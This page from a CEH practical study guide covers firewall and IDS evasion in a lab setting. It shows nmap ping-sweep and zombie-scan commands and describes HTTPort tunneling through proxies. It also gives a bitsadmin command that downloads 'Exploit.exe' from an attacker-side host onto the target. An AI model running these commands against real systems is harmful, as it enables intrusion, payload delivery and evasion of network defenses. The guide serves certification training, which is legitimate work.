CEH Practical Guide
  • Certified Ethical Hacker (CEH v12 and CEH V13) Practical Guide: Complete Study Resources & Tips
  • Module 2. Footprinting and Reconnaissance
    • 1. Footprinting through Search Engines
    • 2. Perform Footprinting Through Internet Research Services
    • 3. Footprinting through Social Networking sites
    • 4. Website Footprinting
    • 5. WHOIS Footprinting
    • 6. DNS Footprinting
    • 7. Network footprinting
    • 8. Email Footprinting
    • 9. Footprinting using footprinting tools
    • 10. Perform Footprinting using AI
  • Module 3. Scanning Networks
    • 1. Host Discovery
    • 2. Port and Service Discovery
    • 3. Perform OS Discovery
    • 4. Scan beyond Firewalls and IDS
    • 5. Network scanning using various tools
    • 6. Perform Network Scanning using AI
  • Module 4. Enumeration
    • 1. Netbios Enumeration (Port 137)
    • 2. SNMP Enumeration (Port 161,162)
    • 3. LDAP Enumeration (Port 389)
    • 4. NFS Enumeration
    • 5. DNS Enumeration
    • 6. SMTP Enumeration
    • 7. RPC, SMB and FTP Enumeration
    • 8. Enumeration using various tools
    • 9. Perform Enumeration using AI
  • Module 5. Vulnerability Assessment
    • 1. Perform Vulnerability Research with Vulnerability Scoring Systems and Databases
    • 2. Perform Vulnerability Assessment using Various Vulnerability Assessment Tools
    • 3. Perform Vulnerability Analysis using AI
  • Module 6. System Hacking
    • 1. Gain access to the system
    • 2. Privilege Escalation
    • 3. Maintain Remote Access and Hide Malicious Activities
    • 4. Clear Logs to hide the Evidence of Compromise
    • 5. Active Directory (AD) Attacks
  • Module 7. Malware Threats
    • 1. Gain access to systems with Trojans
    • 2. Infect the system using Virus
    • 3. Perform Static Malware Analysis
    • 4. Perform Dynamic Malware Analysis
  • Module 8. Sniffing
    • 1. Perform Active Sniffing
    • 2. Perform Network Sniffing using Various Sniffing Tools
    • 3. Detect Network Sniffing
  • Module 9. Social Engineering
    • 1. Perform Social Engineering using tools
    • 2. Detect a Phishing attack
    • 3. Audit Organization security for phishing attacks
    • 4. Social Engineering using AI
  • Module 10. Denial of Service
    • 1. Perform DOS and DDOS with various techniques
    • 2. Detect and Protect DOS and DDOS attacks
  • Module 11. Session Hijacking
    • 1. Perform Session Hijacking
    • 2. Detect Session Hijacking
  • Module 12. Evading IDS, antivirus and Honeypots
    • 1. Intrusion Detection using various tools
    • 2. Evade Firewall using Evasion Techniques
  • Module 13. Hacking Web Servers
    • 1. Footprint the Webserver
    • 2. Perform Webserver attacks
    • 3. Perform a Web Server Hacking using AI
  • Module 14. Hacking Web Applications
    • 1. Footprint the Web Infrastructure
    • 2. Perform Web applications Attacks
    • 3. Detect Web Vulnerabilities using using web application security tools
    • 4. Perform Web Application Hacking using AI
  • Module 15. SQL Injection
    • 1. Perform SQL Injection attacks
    • 2. Detect SQL Vulnerabilities using different tool
    • 3. Perform SQL Injection using AI
  • Module 16. Hacking Wireless Networks
    • 1. Footprint a wireless Network
    • 2. Perform Wireless Traffic Analysis
    • 3. Perform Wireless Attacks
  • Module 17. Hacking Mobile Platforms
    • 1. Hack Android Devices
    • 2. Secure Android Device
  • Module 18. IoT and OT Hacking
    • 1. Footprinting IoT and OT devices
    • 2. Capture and Analyze IoT traffic
    • 3. Perform IoT Attacks
  • Module 19. Cloud Computing
    • 1. Perform Reconnaissance on Azure
    • 2. S3 Bucket Enumeration
    • 3. Exploit S3 buckets
    • 4. Perform Privilege Escalation to Gain Higher Privileges
    • 5. Perform Vulnerability Assessment on Docker Images
  • Module 20. Cryptography
    • 1. Encrypt the Information using Various Cryptography Tools
    • 2. Create a self signed Certificate
    • 3. Perform Disk Encryption
    • 4. Cryptanalysis Using different tools
    • 5. Perform Cryptography using AI
  • Tips for exams
  • Additional Resources
Powered by GitBook
On this page
  • 1. Bypass firewall using Nmap
  • 2. Bypass firewall rules using HTTP/ FTP Tunneling
  • 3. Bypass antivirus using metasploit templates
  • 4. Bypass firewall using windows BITSAdmin

Was this helpful?

  1. Module 12. Evading IDS, antivirus and Honeypots

2. Evade Firewall using Evasion Techniques

Previous1. Intrusion Detection using various toolsNextModule 13. Hacking Web Servers

Last updated 6 months ago

Was this helpful?

1. Bypass firewall using Nmap

Add a rule in windows firewall to block all traffic from the attacking machine.

In Ping sweep, the host will appear as online

nmap -sP 192.168.18.0/24

Zombie scan can bypass the firewall rule

nmap -sI 192.168.18.2 192.168.18.11  \\.11 is the target

2. Bypass firewall rules using HTTP/ FTP Tunneling

HTTPort allows users to bypass the HTTP proxy, which blocks Internet access to e-mail, instant messengers, P2P file sharing, ICQ, News, FTP, IRC, etc. Here, the Internet software is configured, so that it connects to a local PC as if it is the required remote server; HTTPort then intercepts that connection and runs it via a tunnel through the proxy. HTTPort can work on devices such as proxies or firewalls that allow HTTP traffic. Thus, HTTPort provides access to websites and Internet apps. HTTPort performs tunneling using one of two modes: SSL/CONNECT mode and a remote host. The remote host method is capable of tunneling through any proxy. HTTPort uses a special server software called HTTHost, which is installed outside the proxy-blocked network. It is a web server, and thus when HTTPort is tunneling, it sends a series of HTTP requests to the HTTHost. The proxy responds as if the user is surfing a website and thus allows the user to do so. HTTHost, in turn, performs its half of the tunneling and communicates with the target servers. This mode is much slower, but works in the majority of cases and features strong data encryption that makes proxy logging useless.

3. Bypass antivirus using metasploit templates

Not very good (to do list)

4. Bypass firewall using windows BITSAdmin

The utilty can be used to transfer files in windows command prompt

BITS (Background Intelligent Transfer Service) is an essential component of Windows XP and later versions of Windows operating systems. BITS is used by system administrators and programmers for downloading files from or uploading files to HTTP webservers and SMB file shares. BITSAdmin is a tool that is used to create download or upload jobs and monitor their progress.

bitsadmin /transfer Exploit.exe http://10.10.1.13/share/Exploit.exe c:\Exploit.exe
HTTPort, secure TCP through HTTP tunneling
Certified Ethical Hacker (CEHv12) Practical hands on LabsUdemy
Logo